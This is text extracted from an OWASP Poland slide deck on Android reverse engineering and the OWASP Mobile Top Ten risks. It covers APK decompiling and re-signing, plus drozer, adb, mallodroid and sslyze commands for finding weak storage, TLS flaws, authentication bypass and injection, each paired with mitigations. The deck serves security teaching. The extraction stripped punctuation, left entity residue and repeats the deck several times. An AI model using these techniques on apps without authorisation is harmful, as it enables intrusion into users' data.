id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
What are we going to talk abouthellip
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
Before we starthellip the threat model
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
Client side injection ndash real examplebull The UniversalMDMClient (built-in application Samsung KNOX
ndash a security feature to seperate personal and professional activities)
bull Crafted URI with bdquosmdmrdquo prefix allows for remote installation of ANY application while a user thinks hersquos installing an update for UniversalMDMClient
bull How it works in practice httpswwwyoutubecomwatchtime_continue=56ampv=6O9OBmsv-CM
Client side injection - mitigations
bull Always validate on a server side any user inputbull For internal communication use only explicit
Intentsbull Avoid using Intent-filter Even if the Activity has
atribute bdquoexported=falserdquo another application can define the same filter and a system displays a dialog so the user can pick which app to use
M9 - Improper session handling
Improper session handling ndash what it is
bull Simple words definition if your session token can be guessed retrieved by third party or never expires then you have a problem
Improper session handling ndash how to find
bull Intercept requests with proxy (eg Burp) and verify ifndash Verify if a session expires (copy a cookie and try to use it
after 30 minutes)ndash Verify if a session is destroyed after authentication state
changes (eg switching from any logged in user to another logged in user)
ndash Verify if you are able to guess any other session (eg itrsquos easy to impersonate other user when application uses device ID as a session token)
Improper session handling ndash few facts from reality
bull What we know is that bdquosessions have to expirerdquohellip
bull hellipbut how long should it REALLY lastbull According to experiment the average application
session (counted from opening an app to closing it) lastshellip 7156 seconds
- httpwwwmendeleycomresearchfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usage
Improper session handling - mitigations
bull Invalidate session on a server sidebull Set session expiration time adjusted to your
applicationbull Destroy all unused session tokensbull Use only high entropy tested token
generation resources
Thank you
pawelrzepaoutlookcom
Referencesbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Top_Ten_Mobile_Risksbull httpsgithubcomikusthello-pinnedcertsbull httpwwwexploresecuritycomtesting-for-cipher-suite-preferencebull httpresourcesinfosecinstitutecomandroid-hacking-security-part-4-exploiting-unintended-data-leakage-side-channel-data-leakagebull httpwwwslidesharenetJackManninoowasp-top-10-mobile-risksbull httpsmanifestsecuritycomandroid-application-securitybull httpsmobilesecuritywikicombull httpandroidcrackingblogspotde201402zerdeis-luyten-worthwhile-jd-guihtmlbull httpswwwacsacorg2011openconfmodulesrequestphpmodule=oc_programampaction=viewphpampa=amp
id=111amptype=3ampOPENCONF=54jm3hh7laelc19qq6ernql5m2bull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Mobile_Threat_Modelbull httpswwwowasporgindexphpProjectsOWASP_Mobile_Security_Project_-_Security_Testingbull httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdfbull httpswwwssllabscomssltestbull httpwwwslidesharenetibmsecurityovertaking-firefox-profiles-vulnerabilities-in-firefox-for-androidbull httpresourcesinfosecinstitutecomcracking-nq-vault-step-by-stepbull httpwwwslidesharenetibmsecuritypinpointing-vulnerabilities-in-android-applications-like-finding-a-needle-in-a-haystackbull httpsgithubcomlinkedinqarkbull httpswwwmendeleycomcatalogfalling-asleep-angry-birds-facebook-kindle-large-scale-study-mobile-application-usagebull httpblogquarkslabcomabusing-samsung-knox-to-remotely-install-a-malicious-application-story-of-a-half-patched-vulnerabilityhtmlbull httpwwwbkavcomtop-news-view_contentcontent46264critical-flaw-in-viber-allows-full-access-to-android-smartphones-bypassing-lock-screenbull httpthehackernewscom201405microsoft-outlook-app-for-androidhtmlbull httpsdrivegooglecomfiled0BxOPagp1jPHWVnlzWGNVbFBMTW8viewpref=2amppli=1
Reverse Engineering amp Malware Analysis
Daniel RamirezOWASP Poland24022016
Anatomy of an apk
Getting our apk file
bull From the phonendash APKOpticndash Astro File Manager
bull Using ADBbull Use APKpure
Decompiling || Disassembling
bull Decompilingndash High Level ndash Java Code
bull Disassemblingndash Low Level ndash Assembly Code
bull Why Disassembling and not Decompiling
Decompiling
DEX JAR JAVA
JAR DEXJAVA
Decompiling-Dex2Jar
bull dex2jarndash Converts Dalvik bytecode (DEX) to java bytecode
(JAR) ndash Allows to use any existing Java decompiler with
the resulting JAR file
Decompiling ndash Java Decompilers
bull JD-GUI || Luytenndash Closed source Java decompilerndash Combined with dex2jar you can use JD-GUI or
Luyten to decompile Android applications
bull Both are Java decompilers but have different OUTPUT
JD-GUI
Luyten
Disassembling
DEX SMALI
Disassembling
bull Apktoolndash Open source Java tool for reverse-engineering
Android appndash Transform binary Dalvik byte code(dex) into Smali
source
Signing apk
bull Using signapkjarjava -jar signapkjar certificatepem keypk8 your-appapk your-app-signedapk
bull Using AppUse
Demo Time
Demo Decompiling Luyten
Demo Modify Smali Files
Demo
M2 - Insecure data storage
Insecure data storage ndash what it is
bull Simple words definition valuable pieces of data (eg passwords cookies personal information) are stored in the data-stores on the device in insecure (plain text or reversable encoding) format
Insecure data storage ndash what to look for
bull Look for any sensitive information inndash SQLite databases (local)ndash XML Data Storesndash Plain text configuration filesndash Cookie storesndash SD Card
Insecure data storage ndash how to find
bull Install and run application for some timebull Monitor changes in sdcard before and after
installing an applicationbull Analyze package files on different stages
adb pull datadataltapk_package_namegt
Insecure data storage - demo
Insecure data storage ndash real example
bull Outlook stored all attachements as unencrypted and world readable files on external storage
Insecure data storage - mitigations
bull Donrsquot store data unless itrsquos absolutely necessarry
bull Use encryption for local storage (use method setStorageEncryption)
bull For databases consider using SQLcipher for Sqlite data encryption
bull Ensure any shared preferences properties are NOT MODE_WORLD_READABLE
M3 - Insufficient transport layer protection
Insufficient transport layer protection ndash what it is
bull Simple words definition application does NOT implement TLS or it does incorrectly
What do you mean bdquoincorrectlyrdquo
bull Insecure implementations arendash Using known weak ciphers version (eg
SSLv2SSLv3 RC4)ndash Securing only part of the communication (eg only
authentication)ndash Lack of certificate inspection
Certificate inspection in web applications ndash chain of trustbull In web applications the validation of certificate is on the
side of a browserbull It is done by a bdquochain of trustrdquo
bull But how a mobile app can know if it is communicating with a proper server
Cert Pinning - theory
bull Embedded in source code expected X509 certificate or public key
if (presented_cert == pinned_cert)Start_connection()elseDrop_connection()
Cert Pinning - reality
bull Guys from Leibniz Universitaumlt Hannover tested 100 apps andhellip
bull 21 apps trust all certificatesbull 20 apps accept all hostnamesbull And in the end they asked developers why it
happenedhellip
More httpswwwowasporgimages777Hunting_Down_Broken_SSL_in_Android_Apps_-_Sascha_Fahl2BMarian_Harbach2BMathew_Smithpdf
Insufficient transport layer protection- how to find
bull Passive analysis with WiresharkBurp (to check if all traffic is encrypted)
bull Use Mallodroidmallodroidpy ndashf AppToCheckapk ndashd javaout
bull Look for end point implementation flaws using SSLyze (or httpswwwssllabscomssltest for public domain)
sslyze --regular wwwexamplecom443
Insufficient transport layer protection- example
Insufficient transport layer protection-few facts from reality
bull According to the FireEye research from July 17 2014 among 1000 most-downloaded free applications in the Google Play store
Source httpswwwfireeyecomblogthreat-research201408ssl-vulnerabilities-who-listens-when-android-applications-talkhtml
Insufficient transport layer protection- mitigationsbull Any sensitive data MUST be transfered over TLSbull How to do it properly Follow the rules https
wwwowasporgindexphpTransport_Layer_Protection_Cheat_Sheet
M4 - Unintended data leakage
Unintended data leakage ndash what it is
bull Simple word definition OSframeworks puts sensitive information in an insecure location in the device
bull Important note insecure data storage talks about developer conscious efforts to store data in insecure manner while unintended data leakage refers to OSframework specific quirks which can cause data leakages
Unintended data leakage ndash common leakage points
bull URL Caching bull CopyPaste buffer Cachingbull Loggingbull Analytics data sent to 3rd parties (eg ads
sending GPS location)
Unintended data leakage ndash how to find
bull Extract data from leaking content providers using Drozer
dzgt run appproviderfinduri ltpackage_namegt
bull Use logcat to verify what is being logged using ADBadb logcat [output filter]
bull Use listener (BurpWireshark) to monitor what is being sent to 3rd parties
bull Use Intent Sniffer to see if any confidential data is sent via Intents
Unintended data leakage - demo
Unintended data leakage - mitigations
bull NEVER log any sensitive information (observe what yoursquore storing in crashlogs)
bull Disable copypaste function for sensitive part of the application
bull Disable debugging (androiddebuggable=false)
M5 - Poor Authorization and Authentication
Poor Authorization and Authentication ndash what is it
bull Simple words definition if yoursquore able to bypass authentication andor laverage your privileges thenhellip your app has poor authorization andor authentication
Poor Authorization and Authentication ndash how to find
bull Try to bypass authentication by accessing exported activities using Drozer
dzgt run appactivitystart ndashcomponent ltcomponent_namegt
bull Intercept traffic with Burp and modify parameter to login as other usersee unauthorized content (eg by manipulating device ID)
bull Test account lockout policybull Test strong password policy
Poor Authorization and Authentication - demo
Poor Authorization and Authentication ndash real example
bull A flaw in application can become an entry point to compromise an operating system
bull For example a Viber apphttpswwwyoutubecomwatchtime_continue=40ampv=rScheIQDD0k
And always remember tohellip
bull hellipstay reasonable when yoursquore going to follow advices from the Internethellip
Poor Authorization and Authentication - mitigations
bull Assume that client-side authorization and authentication controls can be bypassed - they must be re-enforced on the server-side whenever possible
bull Persistent authentication (Remember Me) functionality implemented within mobile applications should never store a userrsquos password on the device It should be optional and not be enabled by default
M6 - Broken Cryptography
Broken Cryptography ndash what it is
bull Simple words definition using insecure implementation or implementing it in a insecure way
bull Few reminders (yeah I know you know ithellip)ndash encoding = encryptionndash obfuscation = encryption
Broken Cryptography ndash how to find
bull Decompile the apk using dex2jar (or luyten for more verbose result) and review jar file in JD-GUI
bull Look for decryption keys (in attacker-readable folder or hardcoded within binary)
bull Try to break encryption algorithm if an application uses custom encryption
bull Look for usage of insecure andor deprecated algorithms (eg RC4 MD45 SHA1 etc)
Broken Cryptography - example
bull Encrypted db is definitely a good ideahellip
Broken Cryptography - example
bull hellipbut not when yoursquore hardcoding passwords to decrypt it in codehellip
Broken Cryptography ndash real example
bull NQ Vault
Broken Cryptography - mitigations
bull Use known strong cryptography implementations
bull Do not hardcode keyscredentialsOAUTH tokens
bull Do not store keys on a device Use password based encryption instead
M7 - Client side injection
Client side injection ndash what it is
bull Simple words definition malicious code can be provided as an input and executed by the application (on the client side)
bull The malicious code can come fromndash Other application via intentcontent providerndash Shared filendash Server responsendash Third party website
Client side injection ndash what to inject
bull SQL injection to local dbbull XSSWebView injectionbull Directory traversal
bull Intent injection
A new Androidrsquos toy ndash the Intentsbull Android application can talk
(Inter-Process-Communication) to any other component (eg other application system service running new activity etc) via special objects called Intents
Intent i = new Intent(IntentACTION_VIEWUriparse(bdquohttpsowasporgrdquo))Intent i = new Intent(androidproviderMediaStoreAction_IMAGE_CAPTURE)
Client side injection ndash how to find
bull SQL injectionsdzgt run scannerproviderinjection ndasha ltpackage_namegt
bull Data path traversaldzgt run scannerprovidertraversal ndasha ltpackage_namegt
bull Intent injectionsdzgt run apppackagemanifest ndasha ltpackage_namegtdzgt run appactivityinfo ndasha ltpackage_namegt
dzgt run appserviceinfo --permission null ndasha ltpackage_namegtdzgt run intentsfuzzinozer --package_name ltpackage_namegt --
fuzzing_intent
